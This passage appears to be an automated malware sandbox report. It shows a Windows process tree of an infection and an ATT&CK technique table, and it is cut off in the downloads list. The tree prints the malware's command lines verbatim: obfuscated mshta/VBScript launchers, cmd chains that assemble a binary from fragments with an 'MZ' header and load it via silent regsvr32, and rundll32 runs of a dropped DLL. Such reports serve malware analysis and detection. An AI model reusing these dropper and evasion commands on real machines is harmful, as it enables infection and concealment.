                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 968
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:5548
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 1116
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:5672
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" ) do taskkill -Im "%~NxU" -f
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:3968
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\41575.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\41575.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                    PID:5084
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\41575.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\41575.exe") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:1016
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE
                                                                                                                                                                                                                                                                                                          LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                          PID:5320
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj "" == """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                            PID:5516
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj " == "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:5792
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl" ). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 , TRUe ) )
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                              PID:5852
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:5544
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                      PID:6388
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                        PID:6644
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                        regsvr32 .\BgG1KXA.y -U -S
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:7264
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                  taskkill /im "41575.exe" /f
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                  PID:5952
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              PID:6196
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                              PID:5012
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                              PID:6624
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:6756
                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:3900
                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:6720
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                    PID:8068
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      PID:5384
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:6312
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                    PID:2780
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                    PID:8500
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:8516
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                      PID:7228
                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding D87F2DBC0CEB9A7BD92E75F41B77BEBB C
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:7040
                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 927C8C604BA362BEAF53A7756CF81774
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                          PID:6532
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                            PID:6136
                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 69B32C96D08DFAFB70153432295E976F E Global\MSI0000
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:3736
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                          PID:6464
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:2148
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                            PID:8196
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:204
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:7080
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:2308
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:6756
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                  PID:8388
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:7324
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                  PID:8792
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:1836
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:5896
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies system executable filetype association
                                                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:7464
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:8876
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:9184
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                    PID:3228
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:8412
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:9208
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:4536
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                          PID:8996
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                          PID:7984
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                          PID:6600
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                          PID:7108

                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                                                                                                        Change Default File Association

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1042

                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                        6
                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                                        Software Discovery

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1518

                                                                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                                        Security Software Discovery

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1063

                                                                                                                                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          bcb1f4325fc6f66e06d27bc0b680940b

                                                                                                                                                                                                                                                                                                                                          SHA1

